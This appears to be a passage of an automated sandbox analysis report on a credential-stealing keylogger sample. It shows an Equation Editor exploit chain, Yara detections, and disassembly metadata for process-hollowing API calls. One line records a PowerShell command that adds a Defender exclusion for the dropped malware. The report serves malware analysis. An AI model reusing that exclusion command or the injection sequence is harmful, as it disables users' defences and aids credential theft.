                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:2
                                                Start time:03:24:56
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:03:25:01
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 29%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x1f0000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:03:25:02
                                                Start date:26/09/2024
                                                Path:C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe"
                                                Imagebase:0x950000
                                                File size:704'000 bytes
                                                MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.907194224.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:10
                                                Start time:03:25:22
                                                Start date:26/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:15.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:4
                                                  execution_graph 8439 17cbe9 8440 17cb5a 8439->8440 8441 17cb4a 8439->8441 8444 17da39 8441->8444 8448 17da48 8441->8448 8445 17da5d 8444->8445 8452 17da78 8445->8452 8446 17da6f 8446->8440 8449 17da5d 8448->8449 8451 17da78 12 API calls 8449->8451 8450 17da6f 8450->8440 8451->8450 8453 17daa2 8452->8453 8461 17daaa 8453->8461 8468 17deb7 8453->8468 8472 17df29 8453->8472 8477 17e22a 8453->8477 8482 17e0aa 8453->8482 8487 17e1ce 8453->8487 8492 17e120 8453->8492 8497 17e181 8453->8497 8505 17df84 8453->8505 8513 17e506 8453->8513 8518 17e038 8453->8518 8522 17df1f 8453->8522 8529 17e370 8453->8529 8538 17e411 8453->8538 8461->8446 8543 17c525 8468->8543 8547 17c530 8468->8547 8473 17df33 8472->8473 8474 17e74a 8473->8474 8551 17c190 8473->8551 8555 17c198 8473->8555 8474->8461 8478 17df15 8477->8478 8479 17e052 8478->8479 8559 17bf40 8478->8559 8563 17bf39 8478->8563 8479->8461 8479->8479 8483 17df15 8482->8483 8484 17e052 8483->8484 8485 17bf40 Wow64SetThreadContext 8483->8485 8486 17bf39 Wow64SetThreadContext 8483->8486 8484->8461 8485->8484 8486->8484 8488 17e037 8487->8488 8489 17e052 8488->8489 8490 17bf40 Wow64SetThreadContext 8488->8490 8491 17bf39 Wow64SetThreadContext 8488->8491 8489->8461 8490->8489 8491->8489 8493 17e12c 8492->8493 8495 17c190 WriteProcessMemory 8493->8495 8496 17c198 WriteProcessMemory 8493->8496 8494 17e3cd 8495->8494 8496->8494 8498 17e315 8497->8498 8567 17c070 8498->8567 8571 17c068 8498->8571 8499 17e74a 8499->8461 8500 17df44 8500->8499 8501 17c190 WriteProcessMemory 8500->8501 8502 17c198 WriteProcessMemory 8500->8502 8501->8500 8502->8500 8506 17df8a 8505->8506 8575 17be50 8506->8575 8579 17be48 8506->8579 8507 17df0c 8508 17e052 8507->8508 8509 17bf40 Wow64SetThreadContext 8507->8509 8510 17bf39 Wow64SetThreadContext 8507->8510 8508->8461 8509->8508 8510->8508 8514 17e50c 8513->8514 8583 17c2f1 8514->8583 8587 17c2f8 8514->8587 8515 17e52f 8520 17bf40 Wow64SetThreadContext 8518->8520 8521 17bf39 Wow64SetThreadContext 8518->8521 8519 17e052 8519->8461 8519->8519 8520->8519 8521->8519 8525 17bf40 Wow64SetThreadContext 8522->8525 8526 17bf39 Wow64SetThreadContext 8522->8526 8523 17df20 8524 17e052 8523->8524 8527 17bf40 Wow64SetThreadContext 8523->8527 8528 17bf39 Wow64SetThreadContext 8523->8528 8524->8461 8524->8524 8525->8523 8526->8523 8527->8524 8528->8524 8530 17df9b 8529->8530 8531 17e7a7 8530->8531 8534 17be50 ResumeThread 8530->8534 8535 17be48 ResumeThread 8530->8535 8532 17df0c 8533 17e052 8532->8533 8536 17bf40 Wow64SetThreadContext 8532->8536 8537 17bf39 Wow64SetThreadContext 8532->8537 8533->8461 8534->8532 8535->8532 8536->8533 8537->8533 8539 17e421 8538->8539 8541 17c190 WriteProcessMemory 8539->8541 8542 17c198 WriteProcessMemory 8539->8542 8540 17e5bf 8540->8461 8541->8540 8542->8540 8544 17c5b7 CreateProcessA 8543->8544 8546 17c815 8544->8546 8546->8546 8548 17c5b7 CreateProcessA 8547->8548 8550 17c815 8548->8550 8550->8550 8552 17c1e4 WriteProcessMemory 8551->8552 8554 17c283 8552->8554 8554->8473 8556 17c1e4 WriteProcessMemory 8555->8556 8558 17c283 8556->8558 8558->8473 8560 17bf89 Wow64SetThreadContext 8559->8560 8562 17c007 8560->8562 8562->8479 8564 17bf40 Wow64SetThreadContext 8563->8564 8566 17c007 8564->8566 8566->8479 8568 17c0b4 VirtualAllocEx 8567->8568 8570 17c132 8568->8570 8570->8500 8572 17c070 VirtualAllocEx 8571->8572 8574 17c132 8572->8574 8574->8500 8576 17be94 ResumeThread 8575->8576 8578 17bee6 8576->8578 8578->8507 8580 17be94 ResumeThread 8579->8580 8582 17bee6 8580->8582 8582->8507 8584 17c344 ReadProcessMemory 8583->8584 8586 17c3c2 8584->8586 8586->8515 8588 17c344 ReadProcessMemory 8587->8588 8590 17c3c2 8588->8590 8590->8515

                                                  Executed Functions

                                                  Function 00173C10 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 443210bff6df694635662830797c7c0c8dfffad5f2e8022ea1ed93760d1f2de4
                                                  • Instruction ID: ff4d893ecbc5a2eed5a47a7310345e1797651612b41203b8640391a048a2340e
                                                  • Opcode Fuzzy Hash: 443210bff6df694635662830797c7c0c8dfffad5f2e8022ea1ed93760d1f2de4
                                                  • Instruction Fuzzy Hash: FC71E570D09218CFDB18CFA6C8446EDBBB6BF89300F61D06AD429BB255DB345A46EF50
                                                  Function 0017604B Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ff0e2b35c9fda779cf09642bbc58a320c63e5508be3c1862a86d95d32430e42
                                                  • Instruction ID: 283ec42aae467153b15945691ec5f8f1a322804e287b0f980022c1fed9c0d56a
                                                  • Opcode Fuzzy Hash: 0ff0e2b35c9fda779cf09642bbc58a320c63e5508be3c1862a86d95d32430e42
                                                  • Instruction Fuzzy Hash: 2E514274A09769CFDB54DF58C684AADBBB6BB5A381F52C694D04DAB202C330D880EF41
                                                  Function 0017C525 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 17c525-17c5c9 2 17c612-17c63a 0->2 3 17c5cb-17c5e2 0->3 6 17c680-17c6d6 2->6 7 17c63c-17c650 2->7 3->2 8 17c5e4-17c5e9 3->8 17 17c71c-17c813 CreateProcessA 6->17 18 17c6d8-17c6ec 6->18 7->6 15 17c652-17c657 7->15 9 17c60c-17c60f 8->9 10 17c5eb-17c5f5 8->10 9->2 12 17c5f7 10->12 13 17c5f9-17c608 10->13 12->13 13->13 16 17c60a 13->16 19 17c67a-17c67d 15->19 20 17c659-17c663 15->20 16->9 36 17c815-17c81b 17->36 37 17c81c-17c901 17->37 18->17 25 17c6ee-17c6f3 18->25 19->6 22 17c667-17c676 20->22 23 17c665 20->23 22->22 26 17c678 22->26 23->22 27 17c716-17c719 25->27 28 17c6f5-17c6ff 25->28 26->19 27->17 30 17c703-17c712 28->30 31 17c701 28->31 30->30 32 17c714 30->32 31->30 32->27 36->37 49 17c903-17c907 37->49 50 17c911-17c915 37->50 49->50 51 17c909 49->51 52 17c917-17c91b 50->52 53 17c925-17c929 50->53 51->50 52->53 56 17c91d 52->56 54 17c92b-17c92f 53->54 55 17c939-17c93d 53->55 54->55 57 17c931 54->57 58 17c973-17c97e 55->58 59 17c93f-17c968 55->59 56->53 57->55 62 17c97f 58->62 59->58 62->62
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017C7F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: 44#$44#$44#
                                                  • API String ID: 963392458-78978932
                                                  • Opcode ID: 544a5623448a603b849ea4caea0af44550c592a691260118bb8eeed3982b623a
                                                  • Instruction ID: 35ec7eafb1a31db519fb5a3a90c24c2b96507a47bd6d63dd926ae3ade04d6fdc
                                                  • Opcode Fuzzy Hash: 544a5623448a603b849ea4caea0af44550c592a691260118bb8eeed3982b623a
                                                  • Instruction Fuzzy Hash: FDC12674D002698FDF25CFA4C845BEEBBB1BF49300F0095A9E959B7240DB749A85CF91
                                                  Function 0017C530 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 64 17c530-17c5c9 66 17c612-17c63a 64->66 67 17c5cb-17c5e2 64->67 70 17c680-17c6d6 66->70 71 17c63c-17c650 66->71 67->66 72 17c5e4-17c5e9 67->72 81 17c71c-17c813 CreateProcessA 70->81 82 17c6d8-17c6ec 70->82 71->70 79 17c652-17c657 71->79 73 17c60c-17c60f 72->73 74 17c5eb-17c5f5 72->74 73->66 76 17c5f7 74->76 77 17c5f9-17c608 74->77 76->77 77->77 80 17c60a 77->80 83 17c67a-17c67d 79->83 84 17c659-17c663 79->84 80->73 100 17c815-17c81b 81->100 101 17c81c-17c901 81->101 82->81 89 17c6ee-17c6f3 82->89 83->70 86 17c667-17c676 84->86 87 17c665 84->87 86->86 90 17c678 86->90 87->86 91 17c716-17c719 89->91 92 17c6f5-17c6ff 89->92 90->83 91->81 94 17c703-17c712 92->94 95 17c701 92->95 94->94 96 17c714 94->96 95->94 96->91 100->101 113 17c903-17c907 101->113 114 17c911-17c915 101->114 113->114 115 17c909 113->115 116 17c917-17c91b 114->116 117 17c925-17c929 114->117 115->114 116->117 120 17c91d 116->120 118 17c92b-17c92f 117->118 119 17c939-17c93d 117->119 118->119 121 17c931 118->121 122 17c973-17c97e 119->122 123 17c93f-17c968 119->123 120->117 121->119 126 17c97f 122->126 123->122 126->126
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017C7F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: 44#$44#$44#
                                                  • API String ID: 963392458-78978932
                                                  • Opcode ID: 1c8bd2a072a787604b1ab484b0123fd460bd5c52994db14c807cac3d8c2ac328
                                                  • Instruction ID: ff3966b5e8e9a9e303e0edc4948393824019cf75d1e5528df74f8ba77dd4aed3
                                                  • Opcode Fuzzy Hash: 1c8bd2a072a787604b1ab484b0123fd460bd5c52994db14c807cac3d8c2ac328
                                                  • Instruction Fuzzy Hash: 5DC12570D0022D8FDF25CFA4C845BEEBBB1BB49300F0095A9E959B7240DB749A85CF95
                                                  Function 0017C190 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 212 17c190-17c203 214 17c205-17c217 212->214 215 17c21a-17c281 WriteProcessMemory 212->215 214->215 217 17c283-17c289 215->217 218 17c28a-17c2dc 215->218 217->218
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C26B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: a3457bae02aa588694172e8fd7ee9db9096770b2cdaa1dc0a3d3a8b248045846
                                                  • Instruction ID: 426c59965e4ab947acb5ea9f01235e7bae675144d6bc08d4e746bb4422389ac4
                                                  • Opcode Fuzzy Hash: a3457bae02aa588694172e8fd7ee9db9096770b2cdaa1dc0a3d3a8b248045846
                                                  • Instruction Fuzzy Hash: B641AAB5D012589FCF00CFA9D984AEEBBF1BB49310F24942AE819B7250D375AA45CF64
                                                  Function 0017C198 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 17c198-17c203 225 17c205-17c217 223->225 226 17c21a-17c281 WriteProcessMemory 223->226 225->226 228 17c283-17c289 226->228 229 17c28a-17c2dc 226->229 228->229
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C26B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 349ca5814724903478dee517e8c8983a00b5538e03520c01f80b9166605fd51e
                                                  • Instruction ID: 45e13f3a7da55bc208cdba08df04935723366ab38b19beebdd1118254e30ad07
                                                  • Opcode Fuzzy Hash: 349ca5814724903478dee517e8c8983a00b5538e03520c01f80b9166605fd51e
                                                  • Instruction Fuzzy Hash: 9F41ABB4D012589FCF00CFA9D984AEEFBF1BB49310F20942AE819B7210D735AA45CF64
                                                  Function 0017C2F1 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 234 17c2f1-17c3c0 ReadProcessMemory 237 17c3c2-17c3c8 234->237 238 17c3c9-17c41b 234->238 237->238
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C3AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 963989c5984995b990dd78df021c992a89352dd277caf278082383cbffbca44d
                                                  • Instruction ID: 4a7dad2967597e2306d61bd57b92195aaed96dfed83e7440a4251143063b8410
                                                  • Opcode Fuzzy Hash: 963989c5984995b990dd78df021c992a89352dd277caf278082383cbffbca44d
                                                  • Instruction Fuzzy Hash: EE41A8B9D00258DFCF10CFA9D884AEEFBB1BB49310F20942AE815B7240D375A945CFA5
                                                  Function 0017C2F8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 243 17c2f8-17c3c0 ReadProcessMemory 246 17c3c2-17c3c8 243->246 247 17c3c9-17c41b 243->247 246->247
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0017C3AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6f6c656cb0635ab6d11f7a011003b681580bb39363b6cdcd4ee564a18dcda550
                                                  • Instruction ID: e43d59495aaf410ba73d890745e5d0e6c01d20235f78002697dd770a1ff3420d
                                                  • Opcode Fuzzy Hash: 6f6c656cb0635ab6d11f7a011003b681580bb39363b6cdcd4ee564a18dcda550
                                                  • Instruction Fuzzy Hash: 9641BAB4D00258DFCF10CFA9D884AEEFBB1BB49310F20942AE814B7200D735A945CFA5
                                                  Function 0017C068 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 252 17c068-17c130 VirtualAllocEx 256 17c132-17c138 252->256 257 17c139-17c183 252->257 256->257
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0017C11A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: b4b54691507be7f497d6f4a202edf7038558add10e0a71b46185e7cb410d2353
                                                  • Instruction ID: d3301fb3c541b9be4e70699a3f8a856f738b14c80363bb6438ee42e01e96a17b
                                                  • Opcode Fuzzy Hash: b4b54691507be7f497d6f4a202edf7038558add10e0a71b46185e7cb410d2353
                                                  • Instruction Fuzzy Hash: 7F4188B9D00258DFCF10CFA9D985A9EBBB5BB49310F24942AE814BB210D735A905CFA5
                                                  Function 0017C070 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 262 17c070-17c130 VirtualAllocEx 265 17c132-17c138 262->265 266 17c139-17c183 262->266 265->266
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0017C11A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 19f65d01af398c527539dd94fd259d92afff5d6884fe7dd34145917e6043f4af
                                                  • Instruction ID: db572cdbc3fa1bb51cba3ac477ea08b7f6f5368c752453e43521bad89914a549
                                                  • Opcode Fuzzy Hash: 19f65d01af398c527539dd94fd259d92afff5d6884fe7dd34145917e6043f4af
                                                  • Instruction Fuzzy Hash: 314199B8D00258DFCF10CFA9D984ADEFBB5BB49310F20942AE814B7210D735A905CFA5
                                                  Function 0017BF39 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 17bf39-17bfa0 274 17bfb7-17c005 Wow64SetThreadContext 271->274 275 17bfa2-17bfb4 271->275 277 17c007-17c00d 274->277 278 17c00e-17c05a 274->278 275->274 277->278
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017BFEF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 2b97f20ef2e9cad3549f55cfb0ce60e1042d73f849d14026bae0879a600f17f8
                                                  • Instruction ID: e4aaa7b462178574ee1ec621054413d894f5819c0bc5bd11a6b67a3b22d4a1fc
                                                  • Opcode Fuzzy Hash: 2b97f20ef2e9cad3549f55cfb0ce60e1042d73f849d14026bae0879a600f17f8
                                                  • Instruction Fuzzy Hash: 6F41BDB5D00258DFDB10CFA9D984AEEFBB5BF49310F24802AE818B7240D778A945CF94
                                                  Function 0017BF40 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 17bf40-17bfa0 285 17bfb7-17c005 Wow64SetThreadContext 283->285 286 17bfa2-17bfb4 283->286 288 17c007-17c00d 285->288 289 17c00e-17c05a 285->289 286->285 288->289
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0017BFEF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 52f5495832678101ea200269544d53e48e3196830ae3ed99862a7a9fd055023d
                                                  • Instruction ID: 1754b1f69cc0087f4c6f368d91dba1a0f35bbdcadd09a8942d54a9bf74abd14e
                                                  • Opcode Fuzzy Hash: 52f5495832678101ea200269544d53e48e3196830ae3ed99862a7a9fd055023d
                                                  • Instruction Fuzzy Hash: AC41BDB4D00258DFDB14CFA9D984AEEFBB5BF49314F24802AE818B7240D779A945CF94
                                                  Function 0017BE48 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 17be48-17bee4 ResumeThread 297 17bee6-17beec 294->297 298 17beed-17bf2f 294->298 297->298
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: eace36eb03b6e5703a97dc8d26c01d2361005f662b1778cde42a8c1ea6cab0cb
                                                  • Instruction ID: 270b2a8d871ed9adb63e3f9edfa6083eb025222e95fba3d809297eb803b8b020
                                                  • Opcode Fuzzy Hash: eace36eb03b6e5703a97dc8d26c01d2361005f662b1778cde42a8c1ea6cab0cb
                                                  • Instruction Fuzzy Hash: CA31D9B4D042589FDF14CFA9D884AEEFBB0AF49310F24942AE819B7300D775A905CF95
                                                  Function 0017BE50 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 1747e08ea4903e2e0211094ab7d590311e80ee6ce9271d989500017a00887296
                                                  • Instruction ID: 68dcdf636066b2385f3b33529c57650acf7c335b21497d2891088e66bccfa444
